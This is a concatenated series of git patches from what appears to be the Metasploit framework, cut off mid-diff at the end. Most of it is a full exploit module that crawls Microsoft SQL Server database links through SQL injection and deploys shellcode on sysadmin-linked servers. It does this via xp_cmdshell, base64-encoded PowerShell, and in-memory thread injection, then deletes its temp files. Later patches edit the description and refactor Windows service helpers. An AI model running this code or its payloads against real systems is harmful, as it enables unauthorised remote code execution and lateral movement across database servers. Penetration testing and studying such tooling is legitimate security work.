powershell called from syswow64 - powershell_cmd = "$temppath=(gci env:temp).value;$dacode=(gc $temppath\\#{rand_filename}) -join '';if((gci env:processor_identifier).value -like '*64*'){$psbits=\"C:\\windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -noprofile -encodedCommand $dacode\"} else {$psbits=\"powershell.exe -noexit -noprofile -encodedCommand $dacode\"};iex $psbits" - powershell_uni = Rex::Text.to_unicode(powershell_cmd) + powershell_cmd = "$temppath=(gci env:temp).value;$dacode=(gc $temppath\\#{rand_filename}) -join '';if((gci env:processor_identifier).value -like\ + '*64*'){$psbits=\"C:\\windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -noprofile -encodedCommand $dacode\"} else {$psbits=\"powershell.exe\ + -noexit -noprofile -encodedCommand $dacode\"};iex $psbits" + powershell_uni = Rex::Text.to_unicode(powershell_cmd) powershell_64 = Rex::Text.encode_base64(powershell_uni) - # Setup query + # Setup query execute = "select 1; EXEC master..xp_cmdshell 'powershell -EncodedCommand #{powershell_64}'" sql = query_builder(path,"",0,execute) - # Execute the playload print_status("Executing payload...") - result = mssql_query(sql, false) if mssql_login_datastore + result = mssql_query(sql, false) if mssql_login_datastore # Remove payload data from the target server execute = "select 1; EXEC master..xp_cmdshell 'powershell -C \"Remove-Item %TEMP%\\#{rand_filename}\";powershell -C \"Remove-Item %TEMP%\\#{var_duplicates}\"'" sql = query_builder(path,"",0,execute) From 9158497fb4222798be71570d7a77ed874f175cb2 Mon Sep 17 00:00:00 2001 From: nullbind Date: Thu, 1 Nov 2012 20:59:37 -0500 Subject: [PATCH 006/154] msftidy updates --- .../windows/mssql/mssql_linkcrawler_sqli.rb | 568 ++++++++++++++++++ 1 file changed, 568 insertions(+) create mode 100644 modules/exploits/windows/mssql/mssql_linkcrawler_sqli.rb diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler_sqli.rb b/modules/exploits/windows/mssql/mssql_linkcrawler_sqli.rb new file mode 100644 index 0000000000..93264736aa --- /dev/null +++ b/modules/exploits/windows/mssql/mssql_linkcrawler_sqli.rb @@ -0,0 +1,568 @@ +require 'msf/core' +require 'msf/core/exploit/mssql_commands' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::MSSQL_SQLI + include Msf::Auxiliary::Report + include Msf::Exploit::CmdStagerVBS + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Microsoft SQL Server - Database Link Crawler', + 'Description' => %q{ + When provided with a valid SQLi URL, this module will crawl SQL Server database links and identify MSSQL links configured with sysadmin privileges. + + Syntax for injection URLs: + + Error: /account.asp?id=1+and+1=[SQLi];-- + + Union: /account.asp?id=1+union+all+select+null,[SQLi],null;-- + Union works most reliably if "id=1" does not return any data, i.e. use "id=12345678" + + Blind: /account.asp?id=1;[SQLi];-- + + The payload deployment works currently only on systems that have powershell. Powershell deployment code based on Matthew Graeber's research. + }, + 'Author' => + [ + 'Antti Rantasaari ', + 'Scott Sutherland "nullbind" ' + ], + 'Platform' => [ 'Windows' ], + 'License' => MSF_LICENSE, + 'References' => [[ 'URL', 'http://www.netspi.com/' ],['URL','http://msdn.microsoft.com/en-us/library/ms188279.aspx'], + ['URL','http://www.exploit-monday.com/2011_10_16_archive.html']], + 'Version' => '$Revision: 1 $', + 'DisclosureDate' => 'Jan 1 2000', + 'Targets' => + [ + [ 'Automatic', { } ], + ], + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptBool.new('VERBOSE', [false, 'Set how verbose the output should be', 'false']), + OptString.new('TYPE', [ true, 'SQLi type (ERROR,UNION, or BLIND)', 'ERROR']), + OptString.new('CHARSET', [true, 'Charset used for blind injections', 'default']), + OptString.new('DELAY', [true, 'Time delay for blind injections - 1-5 seconds', '1']), + OptBool.new('DEPLOY', [true, 'Deploy a payload on target systems', 'true']), + OptString.new('DEPLOYLIST', [false,'Comma seperated list of systems to deploy payload to (blank = all)']) + ], self.class) + end + + def exploit + masterList = Array.new + masterList[0] = Hash.new # Define new hash + masterList[0]["name"] = "" # Name of the current database server + masterList[0]["path"] = [[]] # Link path used during crawl - all possible link paths stored + masterList[0]["done"] = 0 # Used to determine if linked need to be crawled + shelled = Array.new # keeping track of shelled systems to prevent multiple incoming sa links resulting in multiple shells on one system + + # Create table to store configuration information from crawled database server links + linked_server_table = Rex::Ui::Text::Table.new( + 'Header' => 'Linked Server Table', + 'Ident' => 1, + 'Columns' => ['db_server', 'link_path','link_priv','link_status'] + ) + save_loot = "" + + type = datastore['type'].to_s.downcase + + print_status("----------------------------------------------------") + print_status("Start time : #{Time.now}") + print_status("----------------------------------------------------") + print_status("Enumerating name of database server entry point") + print_status("----------------------------------------------------") + + ######################################## + # Going through each identified database + ######################################## + while masterList.any? {|f| f["done"] == 0} + server = masterList.detect {|f| f["done"] == 0} + if type=="error" or type=="union" + execute = "(select @@servername as int)" + sql = query_builder(server["path"].first,"",0,execute) + res = mssql_query(sql) + unless res == nil + name = res.body.scan(/startmsf(.*)endmsf/imu).flatten.first + else + name = nil + end + elsif type=="blind" + column = "@@servername" + name = blind_injection(server["path"].first,'name',column) + end + + ################################################## + # Printing statuses + # Calling mssql_permission_checker for good servers (not broken links) + ################################################## + unless server["path"].first.first == nil + print("\n") if datastore['VERBOSE'] == true + print_status("----------------------------------------------------") + print_status("Enumerating server information #{masterList[0]["name"]} -> #{server["path"].first.join(" -> ")}") + print_status("----------------------------------------------------") + end + unless name == nil + server["name"] = name + print_status("Server information") + print_status(" o Server name: #{name}") + if server["path"].first.first != nil + print_status(" o Path: #{masterList[0]["name"]} -> #{server["path"].first.join(" -> ")}") + else + print_status(" o Path: NA") + end + privstatus = mssql_permission_checker(server,masterList,name,type,shelled) + badlink = 0 + else + print_error("Server information - bad link") + print_status(" o Server name: #{server["path"].first.last}") + print_status(" o Path: #{masterList[0]["name"]} -> #{server["path"].first.join(" -> ")}") + print_status(" o Privileges: NA") + badlink = 1 + end + + # Write Report and Display output to the screen + save_loot = "yes" + write_to_report(server["name"],server["path"],masterList[0]["name"],privstatus,badlink,linked_server_table) + + # Get number of good links on the server + count = nil + if type=="error" or type == "union" and name != nil + execute = "(select cast(count(srvname) as varchar) from master..sysservers where srvname != @@servername and dataaccess = 1 and srvproduct = 'SQL Server')" + sql = query_builder(server["path"].first,"",0,execute) + res = mssql_query(sql) + count = res.body.scan(/startmsf(.*)endmsf/imu).flatten.first + elsif type=="blind" and name !=nil + column = "srvname" + if server["name"] != nil + count = blind_injection(server["path"].first,'linkcount',column) + end + end + + ########################### + # Crawling database links # + ########################### + if count != nil and count != 0 + print_status("") + print_status("Crawling linked servers on #{server["name"]}...") + print_status("Links found: #{count}") + (1..Integer(count)).each do |i| + name = nil + if type=="error" or type == "union" + execute = "select top 1 srvname from master..sysservers where srvname in (select top " + i.to_s + \ + " srvname from master..sysservers where srvname != @@servername and dataaccess = 1 \ + and srvproduct = 'SQL Server' order by srvname asc) order by srvname desc" + sql = query_builder(server["path"].first,"",0,execute) + res = mssql_query(sql) + name = res.body.scan(/startmsf(.*)endmsf/imu).flatten.first + elsif type=="blind" + column = "srvname" + name = blind_injection(server["path"].first,'name',column,i.to_s) + end + print_status("Found a link to #{name}") + + if name != nil + unless masterList.any? {|f| f["name"] == name} + masterList << add_host(name,server["path"].first) + else + (0..masterList.length-1).each do |x| + if masterList[x]["name"] == name + masterList[x]["path"] << server["path"].first.dup + masterList[x]["path"].last << name + print_status("Alternative path to #{name}: #{masterList.first["name"]} -> #{server["path"].first.join(" -> ")} -> #{name}") + privstatus = mssql_permission_checker(server,masterList,name,type,shelled) + else + break + end + end + end + end + end + end + server["done"] = 1 + end + print_status("----------------------------------------------------") + print_status("End time : #{Time.now}") + print_status("----------------------------------------------------") + + # Setup table for loot + this_service = nil + if framework.db and framework.db.active + this_service = report_service( + :host => rhost, + :port => rport, + :name => 'mssql', + :proto => 'tcp' + ) + end + + # Write log to loot / file + if (save_loot=="yes") + filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_linked_servers.csv" + path = store_loot("crawled_links", "text/plain", datastore['RHOST'], linked_server_table.to_csv, filename, "Linked servers",this_service) + print_status("Results have been saved to: #{path}") + end + end + + #------------------------------------------------------------------------------------- + # Method to check if xp_cmdshell accessible - if so, calls payload delivery method + #------------------------------------------------------------------------------------- + def mssql_permission_checker(server,masterList,name,type,shelled) + temppath = Array.new + server["path"].first.each {|j| temppath << j} + + unless temppath.last == name or server["path"].first.first == nil + temppath << name + end + + # Checking if sysadmin privileges on the server + sysadmin = "0" + if type == "error" or type == "union" + execute = "(select cast(is_srvrolemember('sysadmin') as varchar))" + sql = query_builder(temppath,"",0,execute) + res = mssql_query(sql) + sysadmin = res.body.scan(/startmsf(.*)endmsf/imu).flatten.first + elsif type == "blind" + column = "sysadmin" + sysadmin = blind_injection(temppath,"enabled",column) + end + + # Checking if xp_cmdshell enabled + if sysadmin == "1" + print_status(" o Privileges: sysadmin") + xpcmdshell = "0" + if type == "error" or type == "union" + execute = "(select cast(value_in_use as varchar) FROM sys.configurations WHERE name = 'xp_cmdshell')" + sql = query_builder(temppath,"",0,execute) + res = mssql_query(sql) + xpcmdshell = res.body.scan(/startmsf(.*)endmsf/imu).flatten.first + elsif type == "blind" + column = "xpcmdshell" + xpcmdshell = blind_injection(temppath,"enabled",column) + end + if xpcmdshell == "1" + if temppath[0] == nil + print_good(" o Xp_cmdshell enabled on #{masterList.first["name"]}") + else + print_good(" o Xp_cmdshell enabled on #{masterList.first["name"]} -> #{temppath.join(" -> ")}") + end + if type == "error" or type == "union" and temppath.first == nil + print_status("Attempting to deliver payload on first server #{name}") + print_status("This may fail depending on the injection point [SQLi] location") + print_status("If no shell, try mssql_payload_sqli module") + end + # Deploying a payload if no shells on system and DEPLOY = true + unless shelled.include?(name) + #Deploy to specific target if specified + if datastore['DEPLOYLIST']=="" + datastore['DEPLOYLIST'] = nil + end + if datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true + print_status("\t - Checking if #{name} is on the deploy list...") + end + if datastore['DEPLOYLIST'] != nil + deploylist = datastore['DEPLOYLIST'].upcase.split(',') + end + if datastore['DEPLOYLIST'] == nil or deploylist.include? name.upcase + if datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true + print_status("\t - #{name} is on the deploy list.") + end + if datastore['DEPLOY'] + powershell_upload_exec(temppath) + end + shelled << name + return 1 + else + print_status("\t - #{name} is NOT on the deploy list, moving on.") and datastore["VERBOSE"] == true + return 1 + end + else + if datastore['DEPLOY'] + print_status("Payload already deployed on #{name}") + return 1 + end + end + end + else + print_status(" o Privileges: user") + return 0 + end + end + #------------------------------------------------------------------------------------- + # Method for blind SQL injections + # Will fail if targeted server very slow - mssql_query function times out at 5 seconds + #------------------------------------------------------------------------------------- + def blind_injection(path,command,column,topcount=false) + delay = datastore['DELAY'] + if delay.to_i<1 or delay.to_i>5 + delay = 1 + end + if command=="name" + length = 0 + spot = 1 + name = "" + # checking if link works - if good, returns link name; if bad, returns nil + unless path.last == nil or column == "srvname" + execute = "select 1; if(select len((#{column})))>0 begin waitfor delay '0:0:#{delay}' end" + sql = query_builder(path,"",0,execute,true) + starttime = Time.now + mssql_query(sql) + if Time.now - starttime > delay.to_i + return path.last + else + return nil + end + end + # get the length of @@servername or linked server srvname + print(" Extracting #{column} value length: ") if datastore['VERBOSE'] == true + (1..100).each do |i| + if column == "@@servername" + execute = "select 1; if(select len((#{column})))=#{i.to_s} begin waitfor delay '0:0:#{delay}' end" + end + if column == "srvname" + execute = "select 1; if(select top 1 len(srvname) from master..sysservers where srvname in \ + (select top #{topcount} srvname from master..sysservers where srvname != @@servername and \ + dataaccess = 1 and srvproduct = 'SQL Server' order by srvname asc) order by srvname desc)='#{i.to_s}' \ + begin waitfor delay '0:0:#{delay}' end" + end + sql = query_builder(path,"",0,execute,true) + starttime = Time.now + mssql_query(sql) + if Time.now - starttime > delay.to_i + print("#{i}\n") if datastore['VERBOSE'] == true + length = i + break + end + end + + if length == 100 + return nil + end + # enumerate servername or linked server servername one character at a time + if datastore['CHARSET'] == 'default' + charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789.\\/-_#!?*@$%&()" + elsif + charset = datastore['CHARSET'] + end + + spot = 1 + print(" Extracting #{column} value: ") if datastore['VERBOSE'] == true + + while spot <= length + charset.each_char do |i| + if column == "@@servername" + execute = "select 1; if(select substring(#{column},#{spot},1))='#{i}' begin waitfor delay '0:0:#{delay}' end" + end + if column == "srvname" + execute = "select 1; if(select top 1 substring(srvname,#{spot},1) from master..sysservers \ + where srvname in (select top #{topcount} srvname from master..sysservers where srvname \ + != @@servername and dataaccess = 1 and srvproduct = 'SQL Server' order by srvname asc) \ + order by srvname desc)='#{i}' begin waitfor delay '0:0:#{delay}' end" + end + sql = query_builder(path,"",0,execute,true) + starttime = Time.now + mssql_query(sql) + if Time.now - starttime > delay.to_i + spot = spot+1 + name = name + i + print("#{i}") if datastore['VERBOSE'] == true + break + end + if i == charset[-1] + print("\n") if datastore['VERBOSE'] == true + print_error("Failed to enumerated server name") + return nil + end + end + end + print("\n") if datastore['VERBOSE'] == true + return name + + # check how many linked servers on database server + elsif command=="linkcount" + (0..100).each do |i| + execute = "select 1; if(select count(srvname) from master..sysservers where srvname != @@servername and dataaccess = 1 \ + and srvproduct = 'SQL Server')=#{i} begin waitfor delay '0:0:#{delay}' end" + sql = query_builder(path,"",0,execute,true) + starttime = Time.now + mssql_query(sql) + if Time.now - starttime > delay.to_i + return i + end + end + return nil + + # check is sysadmin or xp_cmdshell enabled + elsif command=="enabled" + if column == "sysadmin" + execute = "select 1; if(select is_srvrolemember('sysadmin'))=1 begin waitfor delay '0:0:#{delay}' end" + end + if column == "xpcmdshell" + execute = "select 1; if(select cast(value_in_use as varchar) FROM sys.configurations WHERE name = 'xp_cmdshell')='1' \ + begin waitfor delay '0:0:#{delay}' end" + end + sql = query_builder(path,"",0,execute,true) + starttime = Time.now + mssql_query(sql) + if Time.now - starttime > delay.to_i + return "1" + end + return "0" + end + end + + #------------------------------------------------------------------------------------- + # Method that builds nested openquery statements using during crawling + #------------------------------------------------------------------------------------- + def query_builder(path,sql,ticks,execute,nowrap=false) + # Temp used to maintain the original masterList[x]["path"] + temp = Array.new + path.each {|i| temp << i} + # actual query - defined when the function originally called - ticks multiplied + if path.length == 0 + if ticks == 0 and nowrap == false and datastore['TYPE'].to_s.downcase == "error" + execute = "(select cast('startmsf'+(" + execute + ")+'endmsf' as int))" + elsif ticks == 0 and nowrap == false and datastore['TYPE'].to_s.downcase == "union" + execute = "(select 'startmsf'+(" + execute + ")+'endmsf')" + end + return execute.gsub("'","'"*2**ticks) + # openquery generator + else + sql = "(select * from openquery(\"" + temp.shift + "\"," + "'"*2**ticks + query_builder(temp,sql,ticks+1,execute) + "'"*2**ticks + "))" + if ticks == 0 and nowrap == false and datastore['TYPE'].to_s.downcase == "error" + sql = "(select cast('startmsf'+(" + sql + ")+'endmsf' as int))" + elsif ticks == 0 and nowrap == false and datastore['TYPE'].to_s.downcase == "union" + sql = "(select 'startmsf'+(" + sql + ")+'endmsf')" + end + return sql + end + end + + #------------------------------------------------------------------------------------- + # Method for adding new linked database servers to the crawl list + #------------------------------------------------------------------------------------- + def add_host(name,path) + # Used to add new servers to masterList + server = Hash.new + server["name"] = name # Name of the current database server + temppath = Array.new + path.each {|i| temppath << i } + server["path"] = [temppath] + server["path"].first << name + server["done"] = 0 + return server + end + + #------------------------------------------------------------------------------------- + # Method for generating the report + #------------------------------------------------------------------------------------- + def write_to_report(server_name,server_path,master_name,privstatus,badlink,linked_server_table) + # Set server name + report_server = server_name + # Set path + if server_path.first.first == nil #can be used to determine if entry point + report_path = "NA" + frontlabel = "" + else + report_path = "#{master_name} -> #{server_path.first.join(" -> ")}" + frontlabel = "Link " + end + # Set privilege level language + if privstatus == 0 then + report_priv = "USER" + else + report_priv = "SYSADMIN!" + end + # Set bad link language + if badlink == 1 then + report_status = "DOWN" + report_priv = "NA" + else + report_status = "UP" + end + # Add report entry + linked_server_table << [report_server,report_path,report_priv,report_status] + return linked_server_table + end + + #------------------------------------------------------------------------------------- + # Method that delivers shellcode payload via powershell thread injection + # Leaves a powershell process running on the target system + # Code based on http://www.exploit-monday.com/2011_10_16_archive.html + #------------------------------------------------------------------------------------- + def powershell_upload_exec(path) + + print_status("Deploying a payload") + # Create powershell script that will inject our shell code + # Note: Must start multi/handler and set DisablePayloadHandler if expecting multiple shells + myscript ="$code = @\" +[DllImport(\"kernel32.dll\")] +public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); +[DllImport(\"kernel32.dll\")] +public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); +[DllImport(\"msvcrt.dll\")] +public static extern IntPtr memset(IntPtr dest, uint src, uint count); +\"@ +$winFunc = Add-Type -memberDefinition $code -Name \"Win32\" -namespace Win32Functions -passthru +[Byte[]]$sc =#{Rex::Text.to_hex(payload.encoded).gsub('\\',',0').sub(',','')} +$size = 0x1000 +if ($sc.Length -gt 0x1000) {$size = $sc.Length} +$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40) +for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)} +$winFunc::CreateThread(0,0,$x,0,0,0)" + + # Unicode encode powershell script + mytext_uni = Rex::Text.to_unicode(myscript) + + # Base64 encode unicode + mytext_64 = Rex::Text.encode_base64(mytext_uni) + + # Generate random file name + rand_filename = rand_text_alpha(8) + var_duplicates = rand_text_alpha(8) + + # Write base64 encode powershell payload to temp file + # This is written 2500 characters at a time due to xp_cmdshell ruby function limitations + # Adding line number tracking to remove line duplication from nested link write commands + linenum = 0 + mytext_64.scan(/.{1,2500}/).each {|part| + execute = "(select 1); EXEC master..xp_cmdshell 'powershell -C \"Write \"--#{linenum}--#{part}\" >> %TEMP%\\#{rand_filename}\"'" + sql = query_builder(path,"",0,execute,true) + result = mssql_query(sql, false) + linenum = linenum+1 + } + + # Remove duplicate lines from temp file and write to new file + execute = "(select 1);exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{rand_filename}| get-unique > %TEMP%\\#{var_duplicates}\"'" + sql = query_builder(path,"",0,execute,true) + result = mssql_query(sql, false) + + execute = "(select 1);exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{var_duplicates} | Foreach-Object {$_ -replace \\\"--.*--\\\",\\\"\\\"} | Set-Content %TEMP%\\#{rand_filename}\"'" + sql = query_builder(path,"",0,execute,true) + result = mssql_query(sql, false) + + # Generate base64 encoded powershell command we can use noexit and avoid parsing errors + # If running on 64bit system, 32bit powershell called from syswow64 - path to Powershell on 64bit systems hardcoded + powershell_cmd = "$temppath=(gci env:temp).value;$dacode=(gc $temppath\\#{rand_filename}) \ + -join '';if((gci env:processor_identifier).value -like '*64*'){$psbits=\"C:\\windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe \ + -noexit -noprofile -encodedCommand $dacode\"} else {$psbits=\"powershell.exe -noexit -noprofile -encodedCommand $dacode\"};iex $psbits" + powershell_uni = Rex::Text.to_unicode(powershell_cmd) + powershell_base64 = Rex::Text.encode_base64(powershell_uni) + + ## Setup and execute shellcode with powershell via xp_cmdshell + print_status("Executing the payload") + execute = "(select 1); EXEC master..xp_cmdshell 'powershell -EncodedCommand #{powershell_base64}'" + sql = query_builder(path,"",0,execute,true) + result = mssql_query(sql, false) + + # Remove payload data from the target server + execute = "(select 1); EXEC master..xp_cmdshell 'powershell -C \"Remove-Item %TEMP%\\#{rand_filename}\";powershell -C \"Remove-Item %TEMP%\\#{var_duplicates}\"'" + sql = query_builder(path,"",0,execute,true) + result = mssql_query(sql,false) + end +end From 0246e921c5018bd751d76b799e051a2ef067f25a Mon Sep 17 00:00:00 2001 From: nullbind Date: Mon, 5 Nov 2012 12:45:54 -0600 Subject: [PATCH 007/154] style, ref, desc, and author updates --- .../windows/mssql/mssql_linkcrawler.rb | 30 ++++++++++++++----- 1 file changed, 22 insertions(+), 8 deletions(-) diff --git a/modules/exploits/windows/mssql/mssql_linkcrawler.rb b/modules/exploits/windows/mssql/mssql_linkcrawler.rb index a5c846af6a..9f37d7c388 100644 --- a/modules/exploits/windows/mssql/mssql_linkcrawler.rb +++ b/modules/exploits/windows/mssql/mssql_linkcrawler.rb @@ -7,21 +7,35 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report include Msf::Exploit::CmdStagerVBS - #include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft SQL Server - Database Link Crawler', - 'Description' => %q{When provided credentials, this module will crawl - SQL Server database links and identify links configured with sysadmin privileges.}, + 'Description' => %q{This module can be used to crawl MS SQL Server + database links and deploy metasploit payloads through links configured + with sysadmin privileges using a valid SQL Server Login. If you are + attempting to obtain multiple reverse shells using this module we + recommend setting the "DisablePayloadHandler" advanced option to "true", + and setting up a multi/handler to run in the background as a job to + support multiple incoming shells. If you are interested in deploying + payloads to spefic servers this module also supports that functionality + via the "DEPLOYLIST" option. Currently, the module is capable of + delivering payloads to both 32bit and 64bit Windows systems via + powershell memory injection methods based on Matthew Graeber's work. + As a result, the target server must have powershell installed. + By default, all of the crawl information is saved to a CSV formatted + log file and MSF loot so that the tool can also be used for auditing + without deploying payloads.}, 'Author' => [ - 'Antti Rantasaari ', - 'nullbind ' + 'Antti Rantasaari ', + 'Scott Sutherland "nullbind" ' ], - 'Platform' => [ 'Windows' ], + 'Platform' => [ 'win' ], 'License' => MSF_LICENSE, - 'References' => [[ 'URL', 'http://www.netspi.com/' ]], + 'References' => [[ 'URL', 'http://www.slideshare.net/nullbind/sql-server-exploitation-escalation-pilfering-appsec-usa-2012'], + ['URL','http://msdn.microsoft.com/en-us/library/ms188279.aspx'], + ['URL','http://www.exploit-monday.com/2011_10_16_archive.html']], 'Platform' => 'win', 'DisclosureDate' => 'Jan 1 2000', 'Targets' => @@ -473,7 +487,7 @@ $winFunc::CreateThread(0,0,$x,0,0,0)" # Write base64 encoded powershell payload to temp file # This is written 2500 characters at a time due to xp_cmdshell ruby function limitations - # Also, line number tracking was added so that duplication lines causes by nested linked + # Also, line number tracking was added so that duplication lines caused by nested linked # queries could be found and removed. print_status("Deploying payload...") linenum = 0 From 34bc92584b93eedfc7e4172acb3edf54b6eb4f94 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 6 Nov 2012 17:30:04 -0600 Subject: [PATCH 008/154] Refactor WindowsServices * Pulls common code up from several methods into #open_sc_manager * Deprecates the name Windows::WindowsServices in favor of Windows::Services. The platform is already clear from the namespace. * Makes the post/test/services test module actually work [See #1007] [See #1012] --- lib/msf/core/payload/php.rb | 12 +- lib/msf/core/post/windows/services.rb | 270 ++++++++++++------ lib/msf/core/post/windows/shadowcopy.rb | 2 +- lib/msf/scripts/meterpreter/services.rb | 2 +- .../windows/local/current_user_psexec.rb | 2 +- .../windows/local/service_permissions.rb | 2 +- .../windows/local/trusted_service_path.rb | 2 +- .../windows/escalate/net_runtime_modify.rb | 2 +- .../windows/escalate/service_permissions.rb | 2 +- modules/post/windows/gather/enum_proxy.rb | 2 +- modules/post/windows/gather/enum_services.rb | 2 +- modules/post/windows/manage/enable_rdp.rb | 2 +- modules/post/windows/manage/persistence.rb | 2 +- test/modules/post/test/services.rb | 124 ++++++-- 14 files changed, 292 insertions(+), 136 deletions(-) diff --git a/lib/msf/core/payload/php.rb b/lib/msf/core/payload/php.rb index 24138bd09d..ec764c2d04 100644 --- a/lib/msf/core/payload/php.rb +++ b/lib/msf/core/payload/php.rb @@ -12,10 +12,10 @@ module Msf::Payload::Php # # The generated code will initialize # - # @options options [String] :disabled_varname PHP variable name in which to + # @option options [String] :disabled_varname PHP variable name in which to # store an array of disabled functions. # - # @returns [String] A chunk of PHP code + # @return [String] A chunk of PHP code # def php_preamble(options = {}) dis = options[:disabled_varname] || '$' + Rex::Text.rand_text_alpha(rand(4) + 4) @@ -42,15 +42,15 @@ module Msf::Payload::Php # # Generate a chunk of PHP code that tries to run a command. # - # @options options [String] :cmd_varname PHP variable name containing the + # @option options [String] :cmd_varname PHP variable name containing the # command to run - # @options options [String] :disabled_varname PHP variable name containing + # @option options [String] :disabled_varname PHP variable name containing # an array of disabled functions. See #php_preamble - # @options options [String] :output_varname PHP variable name in which to + # @option options [String] :output_varname PHP variable name in which to # store the output of the command. Will contain 0 if no exec functions # work. # - # @returns [String] A chunk of PHP code that, with a little luck, will run a + # @return [String] A chunk of PHP code that, with a little luck, will run a # command. # def php_system_block(options = {}) diff --git a/lib/msf/core/post/windows/services.rb b/lib/msf/core/post/windows/services.rb index 64e9f0342f..76b0f10e48 100644 --- a/lib/msf/core/post/windows/services.rb +++ b/lib/msf/core/post/windows/services.rb @@ -5,20 +5,94 @@ module Msf class Post module Windows + +# @deprecated Use {Services} instead module WindowsServices + def self.included(base) + include Services + end + + def setup + print_error("The Windows::WindowsServices mixin is deprecated, use Windows::Services instead") + super + end +end + +# +# Post module mixin for dealing with Windows services +# +module Services include ::Msf::Post::Windows::Registry + # - # List all Windows Services present. Returns an Array containing the names - # of the services. + # Open the service manager with advapi32.dll!OpenSCManagerA on the + # given host or the local machine if :host option is nil. If called + # with a block, yields the manager and closes it when the block + # returns. + # + # @param opts [Hash] + # @option opts [String] :host (nil) The host on which to open the + # service manager. May be a hostname or IP address. + # @option opts [Fixnum] :access (0xF003F) Bitwise-or of the + # SC_MANAGER_* constants (see + # {http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx}) + # + # @return [Fixnum] Opaque Windows handle SC_HANDLE as returned by + # OpenSCManagerA() + # @yield [manager] Gives the block a manager handle as returned by + # advapi32.dll!OpenSCManagerA. When the block returns, the handle + # will be closed with {#close_sc_manager}. + # @raise [RuntimeError] if OpenSCManagerA returns a NULL handle + # + def open_sc_manager(opts={}) + host = opts[:host] || nil + access = opts[:access] || 0xF003F + machine_str = host ? "\\\\#{host}" : nil + + # SC_HANDLE WINAPI OpenSCManager( + # _In_opt_ LPCTSTR lpMachineName, + # _In_opt_ LPCTSTR lpDatabaseName, + # _In_ DWORD dwDesiredAccess + # ); + manag = session.railgun.advapi32.OpenSCManagerA(machine_str,nil,access) + if (manag["return"] == 0) + raise RuntimeError.new("Unable to open service manager, GetLastError: #{manag["GetLastError"]}") + end + + if (block_given?) + begin + yield manag["return"] + ensure + close_sc_manager(manag["return"]) + end + else + return manag["return"] + end + end + + # + # Call advapi32.dll!CloseServiceHandle on the given handle + # + def close_sc_manager(handle) + if handle + session.railgun.advapi32.CloseServiceHandle(handle) + end + end + + # + # List all Windows Services present + # + # @return [Array] The names of the services. + # + # @todo Rewrite to allow operating on a remote host # def service_list serviceskey = "HKLM\\SYSTEM\\CurrentControlSet\\Services" - threadnum = 0 a =[] services = [] registry_enumkeys(serviceskey).each do |s| - if threadnum < 10 + 1.upto 10 do a.push(::Thread.new(s) { |sk| begin srvtype = registry_getvaldata("#{serviceskey}\\#{sk}","Type").to_s @@ -28,10 +102,10 @@ module WindowsServices rescue end }) - threadnum += 1 - else - sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty? - threadnum = 0 + end + until a.empty? + a.first.join + a.delete_if {|x| not x.alive?} end end @@ -45,6 +119,13 @@ module WindowsServices # command executed by the service. Service name is case sensitive. Hash # keys are Name, Start, Command and Credentials. # + # @param name [String] The target service's name (not to be confused + # with Display Name). Case sensitive. + # + # @return [Hash] + # + # @todo Rewrite to allow operating on a remote host + # def service_info(name) service = {} servicekey = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{name.chomp}" @@ -68,6 +149,8 @@ module WindowsServices # Mode is a string with either auto, manual or disable for the # corresponding setting. The name of the service is case sensitive. # + # @todo Rewrite to allow operating on a remote host + # def service_change_startup(name,mode) servicekey = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{name.chomp}" case mode.downcase @@ -81,22 +164,30 @@ module WindowsServices end # - # Create a service that runs it's own process. + # Create a service that runs +executable_on_host+ on the session host # - # It takes as values the service name as string, the display name as - # string, the path of the executable on the host that will execute at - # startup as string and the startup type as an integer of 2 for Auto, 3 for - # Manual or 4 for Disable, default Auto. + # @param name [String] Name of the service to be used as the key + # @param display_name [String] Name of the service as displayed by mmc + # @param executable_on_host [String] EXE on the remote filesystem to + # be used as the service executable + # @param startup [Fixnum] Constant used by CreateServiceA for startup + # type: 2 for Auto, 3 for Manual, 4 for Disable. Default is Auto + # @param server [String,nil] A hostname or IP address. Default is the + # remote localhost + # + # @return [true,false] True if there were no errors, false otherwise # def service_create(name, display_name, executable_on_host, startup=2, server=nil) - machine_str = server ? "\\\\#{server}" : nil adv = session.railgun.advapi32 - manag = adv.OpenSCManagerA(machine_str,nil,0x13) - if(manag["return"] != 0) + + # SC_MANAGER_CONNECT 0x01 + # SC_MANAGER_CREATE_SERVICE 0x02 + # SC_MANAGER_QUERY_LOCK_STATUS 0x10 + open_sc_manager(:host=>server, :access=>0x13) do |manager| # SC_HANDLE WINAPI CreateService( # __in SC_HANDLE hSCManager, # __in LPCTSTR lpServiceName, - # __in_opt LPCTSTR lpDisplayName, + # __in_opt LPCTSTR lpDisplayName, # __in DWORD dwDesiredAccess, # __in DWORD dwServiceType, # __in DWORD dwStartType, @@ -108,113 +199,112 @@ module WindowsServices # __in_opt LPCTSTR lpServiceStartName, # __in_opt LPCTSTR lpPassword #); - # SC_MANAGER_CREATE_SERVICE = 0x0002 - newservice = 